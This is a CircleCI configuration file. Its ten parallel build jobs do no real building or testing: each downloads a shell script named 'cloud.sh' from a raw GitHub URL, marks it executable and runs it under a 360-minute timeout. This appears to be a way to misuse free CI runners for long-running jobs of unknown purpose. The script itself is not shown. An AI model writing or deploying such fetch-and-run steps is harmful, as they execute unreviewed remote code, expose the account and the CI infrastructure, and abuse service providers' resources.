version: 2
jobs:
  build_01:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
      
      
      
  build_02:
    docker:
      - image: node:11.10.1

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_03:
    docker:
      - image: cimg/python:3.8


    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_04:
    docker:
      - image: circleci/ruby:2.6.3-stretch-node

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"

  build_05:
    docker:
      - image: circleci/clojure:lein-2.9.5

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_06:
    docker:
      - image: circleci/golang:1.15.8

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_07:
    docker:
      - image: circleci/elixir:1.4

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_08:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"

  build_09:
    docker:
      - image: cimg/python:3.8

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
      
  build_10:
    docker:
      - image: node:11.10.1
    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh"
  
      
  

  
      
  
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05
            - build_06
            - build_07
            - build_08
            - build_09
            - build_10